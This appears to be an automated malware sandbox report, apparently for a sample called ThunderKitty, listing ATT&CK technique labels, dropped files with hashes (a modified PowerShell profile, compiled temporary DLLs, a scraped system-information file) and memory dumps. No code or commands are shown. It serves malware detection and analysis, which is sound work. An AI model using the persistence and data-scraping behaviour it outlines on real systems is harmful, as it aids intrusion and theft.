Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d71c7d15748177ac7bda63669279b7bd

SHA1
927891cd898e24ccafa1c8dcb79853126953bd3e

SHA256
0f7d506057ea592aa234bc3e6982d2133e2dd3b67bf75678c8b4132f5b50972d

SHA512
fb410da790bdc39eb745c3fd35eb4c1ca2202ce88739ac80f3b061a650544991622512658e482eb124fa6c39ff99ccd95cad74e26dd7804c439dc7b9345ea2a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0789009e381ff689e09144d17087b434

SHA1
43ecb03b5bf2aedd9a0ef7aad408f32b3ecf2eed

SHA256
120dcff0b78993813606335996b0ff453a428710a8f2af6700070fb210cacdad

SHA512
4064b89ef58eab748f0ec6a4ce619b04fb321df90fe32c54ed65e3f02e0116897b066eb41a3586ef8bb513f252b828598196f43e16f3b669d8f11a949b3d65a8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b0bb606a759ab49e1662b1c1139953f7

SHA1
3b0d7a5f6c038e9a53c3616b63160577edfb79de

SHA256
a7c46158f81a64738a8d6aa9d84e026fd6725c77213e461a89a28d87f12b18b1

SHA512
804deeb30ed2825585f1280822fb4fbccdca6b12e86b950792154715825bf7d245729777ee9367344a376b652e873d489a224eeff634a88d503939e30b1aa0f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\3nwtyy3j\3nwtyy3j.dll

Filesize
4KB

MD5
d7912aba936bca50092a15562672416b

SHA1
896538b19a160d9ec79ef9dff006936ab3ae33ce

SHA256
52377bc8a78c107973c4ed1f700ec7606284ab251ef7e3ac52e17f54691a442d

SHA512
1ab429f46bcda11984a8a8e4a134bcb19ccb1b30324ad75b5d55f71284a43600cf94ebf86d734ce8d78fd75a295045068f40335633b2e3d666f0db95b89ffc52

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES88A8.tmp

Filesize
1KB

MD5
22f898e9e2935ccce7003254eb2ae0d8

SHA1
ceb08e2e72f0e20d05922a4536b2713506067728

SHA256
bae5048f6f65fd5c55fa9989937cd28ee0274c1b1619fe3635d2c30f92c96ed1

SHA512
bd69b686f1b5e0440ff97305b13d8d7126cd21182484d9fb2c85def7078804b0f8a54cc14a58dba6aba42ae017bf427bb79ec76d934068fe3ddec64363819b53

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES88B8.tmp

Filesize
1KB

MD5
2d6c89b011d18e7654bc4b6e516b1e0b

SHA1
ad4585d8b7f767fcf733674fc618574af01b6d08

SHA256
980905746e4e64e5648330b549514f6ed915b19b345e2241a55b2705223143fc

SHA512
d737e62fa81b95cb1ef1a4b049916ae4730c396f392b11c1e8e38a5e6a0de974de8a97d2214645102f6c985d5e806b239fd283c661eadc4a26d84c933b793f1f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty.zip

Filesize
93KB

MD5
acbdf2e2c6a5c44b3b589a63ae41408b

SHA1
7643f77f9316814156fd0a49017fef1e5a3b9621

SHA256
63a96e5a606c9a34a15aadd53ce6d93696f11dec8967a72908aade2c8a8075f0

SHA512
6edf8ddb2e1da2d75405c009660b83aee50683478f8eca274a84389ae6e3521acbb9694528c287a4474cde6ed46a0050084bbb8071c2d62f4edda5d785b5d9d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt

Filesize
23KB

MD5
aaba23cb561aec7b0ffae4ace0405d2e

SHA1
ac98764ac99bb5312ac2ac995f3e5cc3c0c05218

SHA256
4d17e37f74838092e60324bf9803fd12b79e969475c65dd77498e8329ccf0e31

SHA512
727aec5daeb6d4ac44ed228cd4e68d4530b30d1bf1e76d21a6bb9957caac90129961ca60dbcf00f7fd1a3138182dd0b415558342045c9570519292261386491f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s4l02a0a.0bj.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\indxs0nx\indxs0nx.dll

Filesize
4KB

MD5
2c828f041e94b76bc9270c1017bccb00

SHA1
2c8f499ba080cb0d47a4a20306250107e54fb554

SHA256
818e18a66ad05a6f5d7fa978ea731ff82da59a03aaab6e784727723d58cd905f

SHA512
1867d051140baf49904daf727dec289da6ba4aa750b05d7a3fe3b1610eb29c6e90d93d9a142e099d56e68d0db0f40e53dc66052b32eee2f4fe412f1c8cdd1dd7

Download Submit
C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

Filesize
2KB

MD5
9758656bbe8589c66bb241b052490c72

SHA1
b73da83fb3ae6b86c6365769a04de9845d5c602c

SHA256
e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351

SHA512
da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3nwtyy3j\3nwtyy3j.0.cs

Filesize
1KB

MD5
8a1e7edb2117ec5dde9a07016905923b

SHA1
0155dbeeb16333e2eaa767b0209750efee56f47f

SHA256
c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007

SHA512
4ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3nwtyy3j\3nwtyy3j.cmdline

Filesize
369B

MD5
95f9292434ef9740f8bcfdedc3b24c66

SHA1
76bf2f62c40ae3388ba171f690bb9366006b921d

SHA256
a6f73274ce9da7716b28be08ae63c4898b7b9436921bfbd7f380a97491c05d71

SHA512
26f681ea36d6b4dc2e03aaa98e9a8a69ea06cecb3ac5127d46bcae9bcad8e0159a1b4d537939853da7127841df9f7ce93061cc2ba6fa0a5c59ec4c3e365b8d85

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3nwtyy3j\CSC3ACFDC58817B41E18C71652D5E26F32.TMP

Filesize
652B

MD5
abc44909765c5a1648c1a27be837fa43

SHA1
7c7286fa4b072cefb0051ee2481c4ecb17b2f5fe

SHA256
3a920c68e4fc3df48f8adbadbd587e3d547c7e0e9d64a8c9bc29015af494b91e

SHA512
006e36c0a4e0623962c75c686d9f29d66b57dbaa72822331d6b63bf06348c2f4c3a5f0bbf67b8bbbdccddfde8eaed5dc49505580ff315153ba2d89e56a4209ce

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\indxs0nx\CSC459A05D4F24E4F02AE99D7A1C8EF249.TMP

Filesize
652B

MD5
49d4957abab4edf792fcb95f02946653

SHA1
67ae06d7377dad75dd3b611622a893763ff09350

SHA256
c2992e524702866eb9f6375cfc6fbcc8de5575e6646de5ab42f049f6d5547014

SHA512
be434458abae039fad8e14a15219c4f7be7cc609ff079ea5b23cf5584d902251fefaa847b0e096efba5cfe1d01a297b0022e7e2e0aee4e6f29885f346aac869d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\indxs0nx\indxs0nx.cmdline

Filesize
369B

MD5
445440d3531aaae20a2326586112301b

SHA1
4e76214e3bb283e2142f067387272232f9a4cd06

SHA256
d96c3790ff40fdc4c8275d84e48d3d4fa13d72eec6bbf67f3c523da2cf9fe3a6

SHA512
d474d0a58ff061fd0845e8bdcd9482f460df10e653cc88879f6b7853d60fe4790e0d8e8e121303bc20b97e637e0e8e71e01524cfd0fe1efff43d484620e0b7d6

Download Submit
memory/1096-68-0x0000029DD32F0000-0x0000029DD32F8000-memory.dmp

Filesize
32KB

Download
memory/1096-0-0x00007FFB0F630000-0x00007FFB0F8F9000-memory.dmp

Filesize
2.8MB

Download
memory/1096-88-0x0000029DD2FB0000-0x0000029DD31CC000-memory.dmp

Filesize
2.1MB

Download
memory/1096-89-0x00007FFB0F630000-0x00007FFB0F8F9000-memory.dmp

Filesize
2.8MB

Download
memory/1096-1-0x00007FFB0F630000-0x00007FFB0F8F9000-memory.dmp

Filesize
2.8MB

Download
memory/2624-77-0x00000200FA440000-0x00000200FA65C000-memory.dmp

Filesize
2.1MB

Download
memory/2624-2-0x00007FFB0F630000-0x00007FFB0F8F9000-memory.dmp

Filesize
2.8MB

Download
memory/2624-78-0x00007FFB0F630000-0x00007FFB0F8F9000-memory.dmp

Filesize
2.8MB

Download
memory/2624-12-0x00000200FA760000-0x00000200FA782000-memory.dmp

Filesize
136KB

Download
memory/3684-65-0x000001B832950000-0x000001B832958000-memory.dmp

Filesize
32KB

Download
memory/3684-93-0x000001B8335A0000-0x000001B8335C4000-memory.dmp

Filesize
144KB

Download
memory/3684-128-0x000001B833450000-0x000001B83345A000-memory.dmp

Filesize
40KB

Download
memory/3684-127-0x000001B833460000-0x000001B833472000-memory.dmp

Filesize
72KB

Download
memory/3684-92-0x000001B8335A0000-0x000001B8335CA000-memory.dmp

Filesize
168KB

Download
memory/3684-137-0x000001B832AD0000-0x000001B832CEC000-memory.dmp

Filesize
2.1MB

Download
memory/3684-80-0x000001B8339A0000-0x000001B834146000-memory.dmp

Filesize
7.6MB

Download
memory/4180-103-0x0000015DAD920000-0x0000015DADB3C000-memory.dmp

Filesize
2.1MB

Download